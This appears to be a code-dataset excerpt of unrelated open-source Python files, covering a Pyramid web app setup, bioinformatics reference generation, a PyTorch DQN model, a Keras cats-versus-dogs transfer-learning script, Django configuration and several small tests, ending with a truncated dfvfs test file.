max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
offlinetools/__init__.py | OpenCIOC/offlinetools | 1 | 12761551 | # =========================================================================================
# Copyright 2016 Community Information Online Consortium (CIOC) and KCL Software Solutions Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =========================================================================================
from __future__ import absolute_import
import os
from pyramid.config import Configurator
from sqlalchemy import create_engine
from sqlalchemy.exc import OperationalError
from pyramid_beaker import session_factory_from_settings
from pyramid.authentication import SessionAuthenticationPolicy
from pyramid.authorization import ACLAuthorizationPolicy
from pyramid.security import NO_PERMISSION_REQUIRED, Authenticated, Deny, Allow, Everyone
from apscheduler.schedulers.background import BackgroundScheduler
from offlinetools.models import initialize_sql, get_config
from offlinetools.request import passvars_pregen
from offlinetools.scheduler import scheduled_pull, key_to_schedule
from offlinetools.logtools import _get_app_data_dir
import logging
log = logging.getLogger('offlinetools')
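# Authentication callback for the SessionAuthenticationPolicy below: maps the
# authenticated user to a single 'group:<ViewType>' principal for use in ACLs.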
def groupfinder(userid, request):
user = request.user
if user is not None:
log.debug('user: %s, %d', user.UserName, user.ViewType)
return ['group:' + str(user.ViewType)]
return None
class RootFactory(object):
__acl__ = [(Allow, Authenticated, 'view'), (Deny, Everyone, 'view')]
def __init__(self, request):
try:
if not request.config.machine_name:
self.__acl__ = [(Allow, Everyone, 'view')]
except OperationalError:
log.critical('request.url: %s', request.path_qs)
def found_view(request):
return request.context
sched = None
def main(global_config, **settings):
""" This function returns a Pyramid WSGI application.
"""
global sched
app_data_dir = _get_app_data_dir()
engine = create_engine('sqlite:///%s\\OfflineTools.db' % app_data_dir, isolation_level='READ UNCOMMITTED')
initialize_sql(engine)
cfg = get_config()
sched = BackgroundScheduler()
sched.start()
sched.add_job(scheduled_pull, 'cron', **key_to_schedule(cfg.public_key))
session_lock_dir = os.path.join(app_data_dir, 'session')
try:
os.makedirs(session_lock_dir)
except os.error:
pass
settings['beaker.session.lock_dir'] = session_lock_dir
session_factory = session_factory_from_settings(settings)
authn_policy = SessionAuthenticationPolicy(callback=groupfinder, debug=True)
authz_policy = ACLAuthorizationPolicy()
config = Configurator(settings=settings, session_factory=session_factory,
root_factory=RootFactory,
request_factory='offlinetools.request.OfflineToolsRequest',
authentication_policy=authn_policy,
authorization_policy=authz_policy)
config.include('pyramid_mako')
config.add_translation_dirs('offlinetools:locale')
config.add_static_view('static', 'offlinetools:static', cache_max_age=3600, permission=NO_PERMISSION_REQUIRED)
config.add_route('search', '/', pregenerator=passvars_pregen)
config.add_view('offlinetools.views.search.Search', route_name='search', attr='search',
permission='view', renderer='search.mak')
config.add_route('results', '/results', pregenerator=passvars_pregen)
config.add_view('offlinetools.views.search.Search', route_name='results', attr='results',
permission='view', renderer='results.mak')
config.add_route('record', '/record/{num}', factory='offlinetools.views.record.RecordRootFactory', pregenerator=passvars_pregen)
config.add_view('offlinetools.views.record.Record', route_name='record',
permission='view', renderer='record.mak')
config.add_route('comgen', '/comgen', pregenerator=passvars_pregen)
config.add_view('offlinetools.views.comgen.ComGen', renderer='json', route_name='comgen', permission='view')
config.add_route('keywordgen', '/keywordgen', pregenerator=passvars_pregen)
config.add_view('offlinetools.views.comgen.KeywordGen', renderer='json', route_name='keywordgen')
config.add_route('login', '/login', pregenerator=passvars_pregen)
config.add_view('offlinetools.views.login.Login', renderer='login.mak', route_name='login',
request_method='POST', attr='post', permission=NO_PERMISSION_REQUIRED)
config.add_view('offlinetools.views.login.Login', renderer='login.mak', route_name='login',
attr='get', permission=NO_PERMISSION_REQUIRED)
config.add_view('offlinetools.views.login.Login', renderer='login.mak',
context='pyramid.httpexceptions.HTTPForbidden',
attr='get', permission=NO_PERMISSION_REQUIRED)
config.add_route('logout', '/logout', pregenerator=passvars_pregen)
config.add_view('offlinetools.views.login.logout', route_name='logout', permission=NO_PERMISSION_REQUIRED)
config.add_route('register', '/register', pregenerator=passvars_pregen)
config.add_view('offlinetools.views.register.Register', route_name='register', request_method='POST',
attr='post', renderer='register.mak', permission=NO_PERMISSION_REQUIRED)
config.add_view('offlinetools.views.register.Register', route_name='register',
attr='get', renderer='register.mak', permission=NO_PERMISSION_REQUIRED)
config.add_route('updateconfig', '/config', pregenerator=passvars_pregen)
config.add_view('offlinetools.views.register.UpdateUrl', route_name='updateconfig', request_method='POST',
attr='post', renderer='updateurl.mak', permission=NO_PERMISSION_REQUIRED)
config.add_view('offlinetools.views.register.UpdateUrl', route_name='updateconfig',
attr='get', renderer='updateurl.mak', permission=NO_PERMISSION_REQUIRED)
config.add_route('pull', '/pull', pregenerator=passvars_pregen)
config.add_view('offlinetools.views.pull.Pull', route_name='pull', renderer='pull.mak')
config.add_route('pull_status', '/pullstatus', pregenerator=passvars_pregen, factory='pyramid.traversal.DefaultRootFactory')
config.add_view('offlinetools.views.pull.PullStatus', route_name='pull_status', renderer='json', permission=NO_PERMISSION_REQUIRED)
config.add_route('status', '/status', factory='offlinetools.views.status.StatusRootFactory', pregenerator=passvars_pregen)
config.add_view('offlinetools.views.status.Status', route_name='status',
renderer='status.mak', permission='view')
config.add_subscriber('offlinetools.subscribers.add_renderer_globals',
'pyramid.events.BeforeRender')
config.scan()
return config.make_wsgi_app()
| 1.476563 | 1 |
tests/guinea-pigs/unittest/nested_suits.py | djeebus/teamcity-python | 105 | 12761552 |
import unittest
from teamcity.unittestpy import TeamcityTestRunner
from teamcity import is_running_under_teamcity
class TestXXX(unittest.TestCase):
def runTest(self):
assert 1 == 1
if __name__ == '__main__':
if is_running_under_teamcity():
runner = TeamcityTestRunner()
else:
runner = unittest.TextTestRunner()
nested_suite = unittest.TestSuite()
nested_suite.addTest(TestXXX())
suite = unittest.TestSuite()
suite.addTest(nested_suite)
runner.run(suite)
| 2.390625 | 2 |
scripts/cropseq_vector_reference.py | lyz9518/TAPseq_workflow | 3 | 12761553 |
#!/usr/bin/env python
# construct fasta sequence files and gtf annotations for vector transcripts that will be added to
# the alignment reference data
import argparse
from Bio import SeqIO
# define functions to generate reference data ------------------------------------------------------
# function to generate alignment reference data from a fasta file containing vector sequences
def cropseq_alignment_reference(input_fasta, output_bn, fasta_ext = ".fasta", prefix = ""):
# output files
fasta_outfile = output_bn + fasta_ext
gtf_outfile = output_bn + ".gtf"
# open output files
output_fasta = open(fasta_outfile, "w")
output_gtf = open(gtf_outfile, "w")
# process each input sequence
for record in SeqIO.parse(input_fasta, "fasta"):
# add prefix to sequence id
record.id = prefix + record.id
# remove name and description to remove them from header in fasta output
record.name = ""
record.description = ""
# create gtf entry
gtf = gtf_entry(record)
# write gtf entry and modified fasta record to respective output files
output_gtf.write("%s\n" % gtf)
SeqIO.write(record, output_fasta, "fasta")
# close open files
output_fasta.close()
output_gtf.close()
# function to create gtf entry from a crop-seq vector fasta record
def gtf_entry(fasta_record):
# get sequence name and length
seq_name = fasta_record.id
seq_len = len(fasta_record.seq)
# create gtf attribute field
attr_names = ["gene_id", "transcript_id", "gene_name", "transcript_name"]
attr = [s + " " + seq_name for s in attr_names]
attr = "; ".join(attr) + ";"
# create gtf entry
gtf_fields = [seq_name, "VECTOR", "exon", "1", str(seq_len), ".", "+", ".", attr]
gtf_line = "\t".join(gtf_fields)
return gtf_line
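# For example, a 100 bp record with the (illustrative) id "vector1" yields the
# tab-separated entry:
# vector1 VECTOR exon 1 100 . + . gene_id vector1; transcript_id vector1; gene_name vector1; transcript_name vector1;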
# create reference files ---------------------------------------------------------------------------
# create crop-seq vector references based on command line arguments if the is called as main
# program
if __name__ == "__main__":
# parse command line arguments
parser = argparse.ArgumentParser(description = ("Create CROP-seq vector "
"alignment references"))
parser.add_argument("-i", "--input_fasta", type = str, required = True,
help = ("Input fasta file containing sequences of CROP-seq vectors."))
parser.add_argument("-o", "--output_bn", type = str, required = True,
help = "Basename for output files.")
parser.add_argument("--fasta_ext", type = str, default = ".fasta",
help = "Filename extension of fasta files "
"(default: .fasta).")
parser.add_argument("--prefix", type = str, default = "",
help = "Optional prefix to be added to sequence name.")
args = parser.parse_args()
# create crop-seq vector reference
cropseq_alignment_reference(input_fasta = args.input_fasta,
output_bn = args.output_bn,
fasta_ext = args.fasta_ext,
prefix = args.prefix)
| 2.875 | 3 |
ex3_len_interval_proposed.py | vonguyenleduy/dnn_representation_selective_inference | 0 | 12761554 | import numpy as np
from tensorflow.keras.models import load_model
import tensorflow as tf
import time
import gen_data
import util
import parametric_si
def run():
d = 8
IMG_WIDTH = d
IMG_HEIGHT = d
IMG_CHANNELS = 1
mu_1 = 0
mu_2 = 2
threshold = 20
# np.random.seed(1)
X_test, Y_test = gen_data.generate(1, IMG_WIDTH, mu_1, mu_2)
model = load_model('./model/test_' + str(d) + '.h5')
output = model.predict(X_test, verbose=1)
output = output.flatten()
binary_vec = []
for each_e in output:
if each_e <= 0.5:
binary_vec.append(0)
else:
binary_vec.append(1)
# print("Observe", binary_vec)
X_vec = (X_test.flatten()).reshape((d * d, 1))
x_obs = X_vec
eta, etaTx = util.construct_test_statistic(x_obs, binary_vec, d * d)
u, v = util.compute_u_v(x_obs, eta, d * d)
list_zk, list_results = parametric_si.run_parametric_si(u, v, model, d, IMG_CHANNELS, threshold)
z_interval = util.construct_z(binary_vec, list_zk, list_results)
length = 0
for interval in z_interval:
length = length + (interval[1] - interval[0])
# print(length)
return length
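# The block below parallelizes the repeated trials over MPI ranks; a typical
# invocation (assumed, not part of the original script) would be:
# mpiexec -n 4 python ex3_len_interval_proposed.py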
from mpi4py import MPI
COMM = MPI.COMM_WORLD
start_time = None
if COMM.rank == 0:
start_time = time.time()
max_iteration = 120
no_thread = COMM.size
iter_each_thread = int(max_iteration / no_thread)
else:
iter_each_thread = None
iter_each_thread = COMM.bcast(iter_each_thread, root=0)
local_list_length = []
for i in range(iter_each_thread):
length = run()
if length is not None:
local_list_length.append(length)
total_list_length = COMM.gather(local_list_length, root=0)
if COMM.rank == 0:
total_list_length = [_i for temp in total_list_length for _i in temp]
print(total_list_length)
print("--- %s seconds ---" % (time.time() - start_time)) | 2.15625 | 2 |
test/test_model_case.py | jan-g/psh | 0 | 12761555 | import pytest
from psh.model import Word, Id, CommandSequence, Command, Case, VarRef, ConstantString
from psh.glob import STAR
from psh.local import make_env
w = lambda w: Word([Id(w)])
a = Word([VarRef(Id("a"))])
echo = lambda out: CommandSequence([Command([Word([Id("echo")]), Word([ConstantString(out)])])])
x = w("x")
cmd = lambda *cs: CommandSequence([Command([*cs])])
star = Word([STAR])
@pytest.mark.parametrize(("cmd", "variable", "expected"), (
(CommandSequence([Case(a)]), "", ""),
(CommandSequence([Case(a).with_case(x, echo("foo"))]), "", ""),
(CommandSequence([Case(a).with_case(x, echo("foo"))]), "y", ""),
(CommandSequence([Case(a).with_case(x, echo("foo"))]), "x", "foo"),
(CommandSequence([Case(a).with_case(x, echo("foo")).with_case(star, echo("bar"))]), "", "bar"),
(CommandSequence([Case(a).with_case(x, echo("foo")).with_case(star, echo("bar"))]), "y", "bar"),
(CommandSequence([Case(a).with_case(x, echo("foo")).with_case(star, echo("bar"))]), "x", "foo"),
), ids=lambda x: x.replace(" ", "_") if isinstance(x, str) else x)
def test_basic(cmd, variable, expected):
env = make_env()
env["a"] = variable
assert cmd.evaluate(env) == expected
| 2.40625 | 2 |
service_stats/stats/disk.py | Justintime50/service | 1 | 12761556 | import psutil
from service_stats.stats.globals import Global
class Disk():
@staticmethod
def serve_data():
"""Serve disk info
"""
# Title
disk_title = '='*15 + ' Disk Information ' + '='*15
partition_title = 'Partitions and Usage:'
# Disk Information
partitions = psutil.disk_partitions()
disk = ''
for partition in partitions:
device = f'=== Device: {partition.device} ==='
mountpoint = f' Mountpoint: {partition.mountpoint}'
filesystem_type = f' File system type: {partition.fstype}'
try:
partition_usage = psutil.disk_usage(partition.mountpoint)
except PermissionError:
# Catch errors when a disk isn't ready
continue
total_size = f' Total Size: {Global.get_size(partition_usage.total)}' # noqa
used = f' Used: {Global.get_size(partition_usage.used)}'
free = f' Free: {Global.get_size(partition_usage.free)}'
percentage = f' Percentage: {partition_usage.percent}%'
# Combine each disk into a variable
disk += device + '\n' + mountpoint + '\n' + filesystem_type + \
'\n' + total_size + '\n' + used + '\n' + free + '\n' + \
percentage + '\n'
# Get IO stats since boot
disk_io = psutil.disk_io_counters()
total_read = f'Total read (since boot): {Global.get_size(disk_io.read_bytes)}' # noqa
total_write = f'Total write (since boot): {Global.get_size(disk_io.write_bytes)}' # noqa
final_message = '\n' + disk_title + '\n' + partition_title + \
'\n' + disk + '\n' + total_read + '\n' + total_write
return final_message
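# Example usage (sketch): print the assembled report
# print(Disk.serve_data())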
| 2.59375 | 3 |
app/urls.py | sairamBikkina/sdp1 | 5 | 12761557 |
from django.contrib.auth.views import LoginView, LogoutView
from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('register', views.register, name='register'),
path('login', LoginView.as_view(template_name='login.html'), name='login'),
path('logout', views.user_logout, name='logout'),
path('about', views.about, name='about'),
path('contact', views.contact, name='contact'),
path('appointments', views.appointments, name='appointments'),
path('prescription', views.prescription, name='prescription'),
path('dashboard', views.dashboard, name='dashboard'),
path('account', views.account, name='account'),
path('invoice', views.invoice, name='invoice'),
path('profile', views.profile, name='profile'),
path('profile/<int:id>', views.profile, name='profile_update'),
path('delete/<int:id>', views.delete, name='profile_delete'),
path('delete/<int:id>/confirm', views.delete_confirm, name='delete_confirm'),
path('create_prescription', views.create_prescription, name='create_prescription'),
path('create_appointment', views.create_appointment, name='create_appointment'),
path('create', views.create, name='create'),
path('create_invoice', views.create_invoice, name='create_invoice'),
]
| 1.804688 | 2 |
days/day03/part1.py | jaredbancroft/aoc2021 | 0 | 12761558 | from helpers import inputs
from submarine.submarine import Submarine
def solution(day):
report = inputs.read_to_list(f"inputs/{day}.txt")
s = Submarine()
power_consumption = s.diagnostics("power_consumption", report)
return power_consumption
| 2.546875 | 3 |
yourcfp/proposals/admin.py | sujay0399/CFP | 2 | 12761559 | from django.contrib import admin
from .models import Proposal, ProposalStatus, Feedback
# Register your models here.
admin.site.register(Proposal)
admin.site.register(ProposalStatus)
admin.site.register(Feedback)
| 1.296875 | 1 |
3.1 Classes/Object Oriented Software Design/cse3063_python_zpehlivan_cpolat_tykomur/Main.py | tahayusufkomur/School_Projects | 0 | 12761560 | import errno
import glob
from os.path import join
from typing import List
from jpype import JClass, getDefaultJVMPath, shutdownJVM, startJVM, java
import Generator as gnr
from Word import Word
path = '1150haber/*.txt'
files = glob.glob(path)
if __name__ == '__main__':
ZEMBEREK_PATH: str = join("bin/zemberek-full.jar")
startJVM(
getDefaultJVMPath(),
'-ea',
f'-Djava.class.path={ZEMBEREK_PATH}',
convertStrings=False
)
TurkishSentenceExtractor: JClass = JClass(
'zemberek.tokenization.TurkishSentenceExtractor'
)
extractor: TurkishSentenceExtractor = TurkishSentenceExtractor.DEFAULT
TurkishMorphology: JClass = JClass('zemberek.morphology.TurkishMorphology')
morphology: TurkishMorphology = TurkishMorphology.createWithDefaults()
Nouns = []
Adjectives = []
Verbs = []
Conjunctions = []
PostPositives = []
all_words = []
"""""
We reading all files here and distributing them to 5 different lists depends on their pos'es
"""""
for name in files:
try:
with open(name) as f:
sentences = extractor.fromParagraph(f.read())
for i, word in enumerate(sentences):
x = f'{word}'
sentence: str = x
analyses: java.util.ArrayList = (
morphology.analyzeAndDisambiguate(sentence).bestAnalysis()
)
pos: List[str] = []
# iterate over the analyses without shadowing the list itself
for i, analysis in enumerate(analyses, start=1):
if f'{analysis.getPos()}' != "Punctuation":
x = f'{analysis}'
p = x.find(':') # cleaning data
x = x[1:p] # cleaning data
all_words.append(Word(x, gnr.get_weight(x), f'{analysis.getPos()}')) # all_words
if f'{analysis.getPos()}' == 'Noun':
Nouns.append(Word(x, gnr.get_weight(x), f'{analysis.getPos()}')) # Nouns
if f'{analysis.getPos()}' == 'Verb':
Verbs.append(Word(x, gnr.get_weight(x), f'{analysis.getPos()}')) # Verbs
if f'{analysis.getPos()}' == 'Conjunction':
Conjunctions.append(Word(x, gnr.get_weight(x), f'{analysis.getPos()}')) # Conjunctions
if f'{analysis.getPos()}' == 'PostPositive':
PostPositives.append(Word(x, gnr.get_weight(x), f'{analysis.getPos()}')) # PostPositives
if f'{analysis.getPos()}' == 'Adjective':
Adjectives.append(Word(x, gnr.get_weight(x), f'{analysis.getPos()}')) # Adjectives
else:
continue
except IOError as exc:
if exc.errno != errno.EISDIR:
raise
w_sentences = gnr.generate_sentences(300, 1000, Nouns, Verbs, Adjectives, Conjunctions, PostPositives)
for i in w_sentences:
print('weight -> ', i.lentgth_of_sentence(), ' ', end='')
w = i.words
for t in w:
print(t.name, ' ', end='')
print('')
w_words = gnr.generate_random_weighted_words(all_words, 25, 100)
for i in w_words:
print(i.name, ' ', i.weight)
shutdownJVM()
| 2.59375 | 3 |
crud/migrations/0008_auto_20210701_0715.py | TownOneWheel/townonewheel | 0 | 12761561 | # Generated by Django 3.2.4 on 2021-07-01 07:15
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('crud', '0007_auto_20210701_0713'),
]
operations = [
migrations.AlterField(
model_name='cat',
name='color',
field=models.CharField(blank=True, choices=[('WHITE', '하얀색'), ('GRAY', '회색'), ('YELLOW', '노란색'), ('BLACK', '검은색')], max_length=20, null=True),
),
migrations.AlterField(
model_name='cat',
name='gender',
field=models.CharField(blank=True, choices=[('DONT_KNOW', '모름'), ('FEMALE', '암컷'), ('MALE', '수컷')], max_length=20, null=True),
),
migrations.AlterField(
model_name='cat',
name='neutering',
field=models.CharField(blank=True, choices=[('DONT_KNOW', '모름'), ('O', 'O'), ('X', 'X')], max_length=10, null=True),
),
migrations.AlterField(
model_name='cat',
name='upload_user',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='upload', to=settings.AUTH_USER_MODEL),
),
]
| 1.671875 | 2 |
strings/stringToInteger.py | kushvr7/High-On-DSA | 76 | 12761562 | class Solution(object):
# Runtime: 23 ms, faster than 68.57% of Python online submissions for String to Integer (atoi).00
# Memory Usage: 13.5 MB, less than 79.83% of Python online submissions for String to Integer (atoi).
def myAtoi(self, s):
"""
:type s: str
:rtype: int
"""
i, n = 0, len(s)
sign = 1
while i < n and s[i] == " ": i += 1
if i < n and s[i] in "+-":
sign = -1 if s[i] == "-" else 1
i += 1
res = 0
while i < n and s[i] in set("0123456789"):
res = res * 10 + int(s[i])
i += 1
if sign == -1:
return max(-res, -2**31)
else:
return min(res, 2**31 - 1) | 2.984375 | 3 |
rolling_shutter_skew/largestComponent.py | stellarpower/vio_common | 0 | 12761563 |
# Python program to print connected
# components in an undirected graph
# https://www.geeksforgeeks.org/connected-components-in-an-undirected-graph/
class Graph:
# init function to declare class variables
def __init__(self, V):
self.V = V
self.adj = [[] for i in range(V)]
def DFSUtil(self, temp, v, visited):
# Mark the current vertex as visited
visited[v] = True
# Store the vertex to list
temp.append(v)
# Repeat for all vertices adjacent
# to this vertex v
for i in self.adj[v]:
if not visited[i]:
# Update the list
temp = self.DFSUtil(temp, i, visited)
return temp
# method to add an undirected edge
def addEdge(self, v, w):
self.adj[v].append(w)
self.adj[w].append(v)
# Method to retrieve connected components
# in an undirected graph
def connectedComponents(self):
visited = []
cc = []
for i in range(self.V):
visited.append(False)
for v in range(self.V):
if not visited[v]:
temp = []
cc.append(self.DFSUtil(temp, v, visited))
return cc
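# Quick sanity check (an added sketch, not part of the original snippet):
if __name__ == "__main__":
    g = Graph(5)
    g.addEdge(1, 0)
    g.addEdge(2, 3)
    g.addEdge(3, 4)
    # vertices {0, 1} and {2, 3, 4} form the two components
    print(g.connectedComponents())  # -> [[0, 1], [2, 3, 4]]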
| 4.0625 | 4 |
hw3/DQN_model.py | zeshiYang/homework | 1 | 12761564 | import torch.nn as nn
import numpy as np
import torch
class DQN(nn.Module):
'''
pytorch CNN model for Atari games
'''
def __init__(self,img_shape,num_actions):
super(DQN,self).__init__()
self._conv=nn.Sequential(
nn.Conv2d(4,16,kernel_size=5,stride=2),
nn.BatchNorm2d(16),
nn.Conv2d(16,32,kernel_size=5,stride=2),
nn.BatchNorm2d(32),
nn.Conv2d(32,64,kernel_size=5,stride=2),
nn.BatchNorm2d(64)
)
convw=img_shape[0]
convh=img_shape[1]
for i in range(3):
convw=self._getConvSize(convw,5,2)
convh=self._getConvSize(convh,5,2)
linear_input_size=convh*convw*64
self._linear=nn.Sequential(
nn.Linear(linear_input_size,512),
nn.ReLU(),
nn.Linear(512,num_actions)
)
self.num_actions=num_actions
def _getConvSize(self,size,size_kernal,stride):
'''
get the tensor size after a Conv operation
:param size: input size along one dimension
:param size_kernal: kernel size
:param stride: stride
:return: output size along that dimension
'''
return (size-(size_kernal-1)-1)//stride+1
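# e.g. a 100-pixel dimension with a 5x5 kernel and stride 2 gives
# (100 - (5 - 1) - 1) // 2 + 1 = 48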
def forward(self,img_in):
'''
:param img_in: input image, shape N*C*W*H
:return: Q-values of actions, shape N*num_actions
'''
x=self._conv(img_in)
x=x.view(x.size(0),-1)
return self._linear(x)
def _selectAction(self,img_in,eps_threshold):
'''
select an action epsilon-greedily according to the Q values
:param img_in: input images
:param eps_threshold: exploration threshold (probability of a random action)
:return: action selected
'''
sample=np.random.random()
if(sample>eps_threshold):
with torch.no_grad():
q_value = self.forward(img_in)
return q_value.max(1)[1].item()
else:
return np.random.randint(0,self.num_actions)
def main():
'''
unit test
:return:
'''
import torch
import numpy as np
dqn=DQN((100,100,3),4)
dqn.eval()
img=torch.Tensor(np.zeros((1,4,100,100)))
q=dqn.forward(img)
print(q)
print(q.max(1))
print(dqn._selectAction(img,0.01))
print("finish test")
if __name__=="__main__":
main()
| 2.890625 | 3 |
main.py | poketorena/deep-learning-with-python-and-keras | 0 | 12761565 |
import os, shutil
import numpy as np
from keras import layers
from keras import optimizers
from keras import models
from keras.applications import VGG16
from keras.preprocessing.image import ImageDataGenerator
from keras.preprocessing.image import image
import matplotlib.pyplot as plt
# Path to the directory where the original dataset was extracted
original_dataset_dir = "./dogs-vs-cats/train"
# Path to the directory that will hold the smaller dataset
base_dir = "./cats-and-dogs-small"
# os.mkdir(base_dir)
# Directories for the training, validation, and test datasets
train_dir = os.path.join(base_dir, "train")
# os.mkdir(train_dir)
validation_dir = os.path.join(base_dir, "validation")
# os.mkdir(validation_dir)
test_dir = os.path.join(base_dir, "test")
# os.mkdir(test_dir)
# Directory for the training cat images
train_cats_dir = os.path.join(train_dir, "cats")
# os.mkdir(train_cats_dir)
# Directory for the training dog images
train_dogs_dir = os.path.join(train_dir, "dogs")
# os.mkdir(train_dogs_dir)
# Directory for the validation cat images
validation_cats_dir = os.path.join(validation_dir, "cats")
# os.mkdir(validation_cats_dir)
# Directory for the validation dog images
validation_dogs_dir = os.path.join(validation_dir, "dogs")
# os.mkdir(validation_dogs_dir)
# Directory for the test cat images
test_cats_dir = os.path.join(test_dir, "cats")
# os.mkdir(test_cats_dir)
# Directory for the test dog images
test_dogs_dir = os.path.join(test_dir, "dogs")
# os.mkdir(test_dogs_dir)
# Copy the first 1000 cat images to train_cats_dir
fnames = [f"cat.{i}.jpg" for i in range(1000)]
for fname in fnames:
src = os.path.join(original_dataset_dir, fname)
dst = os.path.join(train_cats_dir, fname)
# shutil.copyfile(src, dst)
# Copy the next 500 cat images to validation_cats_dir
fnames = [f"cat.{i}.jpg" for i in range(1000, 1500)]
for fname in fnames:
src = os.path.join(original_dataset_dir, fname)
dst = os.path.join(validation_cats_dir, fname)
# shutil.copyfile(src, dst)
# Copy the next 500 cat images to test_cats_dir
fnames = [f"cat.{i}.jpg" for i in range(1500, 2000)]
for fname in fnames:
src = os.path.join(original_dataset_dir, fname)
dst = os.path.join(test_cats_dir, fname)
# shutil.copyfile(src, dst)
# Copy the first 1000 dog images to train_dogs_dir
fnames = [f"dog.{i}.jpg" for i in range(1000)]
for fname in fnames:
src = os.path.join(original_dataset_dir, fname)
dst = os.path.join(train_dogs_dir, fname)
# shutil.copyfile(src, dst)
# Copy the next 500 dog images to validation_dogs_dir
fnames = [f"dog.{i}.jpg" for i in range(1000, 1500)]
for fname in fnames:
src = os.path.join(original_dataset_dir, fname)
dst = os.path.join(validation_dogs_dir, fname)
# shutil.copyfile(src, dst)
# Copy the next 500 dog images to test_dogs_dir
fnames = [f"dog.{i}.jpg" for i in range(1500, 2000)]
for fname in fnames:
src = os.path.join(original_dataset_dir, fname)
dst = os.path.join(test_dogs_dir, fname)
# shutil.copyfile(src, dst)
# Check that the copies succeeded (sanity check)
print("total training cat images:", len(os.listdir(train_cats_dir)))
print("total training dog images:", len(os.listdir(train_dogs_dir)))
print("total validation cat images:", len(os.listdir(validation_cats_dir)))
print("total validation dog images:", len(os.listdir(validation_dogs_dir)))
print("total test cat images:", len(os.listdir(test_cats_dir)))
print("total test dog images:", len(os.listdir(test_dogs_dir)))
conv_base = VGG16(weights="imagenet",
include_top=False,
input_shape=(150, 150, 3))
# The model
model = models.Sequential()
model.add(conv_base)
model.add(layers.Flatten())
model.add(layers.Dense(256, activation="relu"))
model.add(layers.Dense(1, activation="sigmoid"))
# Freeze the weights of the VGG16 model
print()
print(f"This is he number of trainable weights before freezing the conv base: {len(model.trainable_weights)}")
conv_base.trainable = False
print(f"This is he number of trainable weights after freezing the conv base: {len(model.trainable_weights)}")
train_datagen = ImageDataGenerator(
rescale=1. / 255,
rotation_range=40,
width_shift_range=0.2,
height_shift_range=0.2,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True,
fill_mode="nearest"
)
# Note that the validation data should not be augmented
test_datagen = ImageDataGenerator(rescale=1. / 255)
train_generator = train_datagen.flow_from_directory(
train_dir,
target_size=(150, 150),
batch_size=20,
class_mode="binary"
)
validation_generator = test_datagen.flow_from_directory(
validation_dir,
target_size=(150, 150),
batch_size=20,
class_mode="binary"
)
model.compile(loss="binary_crossentropy",
optimizer=optimizers.RMSprop(lr=2e-5),
metrics=["acc"])
print(model.summary())
history = model.fit_generator(train_generator,
steps_per_epoch=100,
epochs=30,
validation_data=validation_generator,
validation_steps=50,
verbose=1)
# Save the model
model.save("cats_and_dogs_small_transfer_learning_fit_dense_overall_optimization.h5")
# Plot the training loss and accuracy
acc = history.history["acc"]
val_acc = history.history["val_acc"]
loss = history.history["loss"]
val_loss = history.history["val_loss"]
epochs = range(len(acc))
# Plot the accuracy
plt.plot(epochs, acc, "bo", label="Training acc")
plt.plot(epochs, val_acc, "b", label="Validation acc")
plt.title("Training and validation accuracy")
plt.legend()
plt.figure()
# Plot the loss
plt.plot(epochs, loss, "bo", label="Training loss")
plt.plot(epochs, val_loss, "b", label="Validation loss")
plt.title("Training and validation loss")
plt.legend()
plt.show()
# Freeze all layers from the beginning up to a specific layer
conv_base.trainable = True
set_trainable = False
for layer in conv_base.layers:
if layer.name == "block5_conv1":
set_trainable = True
if set_trainable:
layer.trainable = True
else:
layer.trainable = False
# Fine-tune the model
model.compile(loss="binary_crossentropy",
optimizer=optimizers.RMSprop(lr=1e-5),
metrics=["acc"])
print(model.summary())
history = model.fit_generator(train_generator,
steps_per_epoch=100,
epochs=100,
validation_data=validation_generator,
validation_steps=50)
# Save the model
model.save("cats_and_dogs_small_transfer_learning_fit_dense_overall_optimization_and_fine_tuning.h5")
# Plot the training loss and accuracy (using an exponential moving average to smooth the curves)
acc = history.history["acc"]
val_acc = history.history["val_acc"]
loss = history.history["loss"]
val_loss = history.history["val_loss"]
epochs = range(len(acc))
def smooth_curve(points, factor=0.8):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
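# e.g. smooth_curve([1, 2, 3]) -> [1, 1.2, 1.56] with the default factor of 0.8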
plt.plot(epochs, smooth_curve(acc), "bo", label="Smoothed training acc")
plt.plot(epochs, smooth_curve(val_acc), "b", label="Smoothed validation acc")
plt.title("Training and validation accuracy")
plt.legend()
plt.figure()
plt.plot(epochs, smooth_curve(loss), "bo", label="Smoothed training loss")
plt.plot(epochs, smooth_curve(val_loss), "b", label="Smoothed validation loss")
plt.title("Training and validation loss")
plt.legend()
plt.show()
# Evaluate on the test data
test_generator = test_datagen.flow_from_directory(
test_dir,
target_size=(150, 150),
batch_size=20,
class_mode="binary"
)
test_loss, test_acc = model.evaluate_generator(test_generator, steps=50)
print(f"test loss: {test_loss}")
print(f"test acc: {test_acc}")
| 2.609375 | 3 |
curris/test/test_script.py | a1trl9/curris | 0 | 12761566 | from curris.test.base import compare_json
def test_script():
compare_json('curris/test/resource/script.md', 'curris/test/resource/script.json')
| 1.46875 | 1 |
tests/file_io/raw_file_io.py | Defense-Cyber-Crime-Center/dfvfs | 2 | 12761567 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""Tests for the file-like object implementation using pysmraw."""
import os
import unittest
from dfvfs.path import raw_path_spec
from dfvfs.path import os_path_spec
from tests.file_io import test_lib
class RawFileTest(test_lib.ImageFileTestCase):
"""The unit test for the RAW storage media image file-like object."""
def setUp(self):
"""Sets up the needed objects used throughout the test."""
super(RawFileTest, self).setUp()
test_file = os.path.join(u'test_data', u'ímynd.dd')
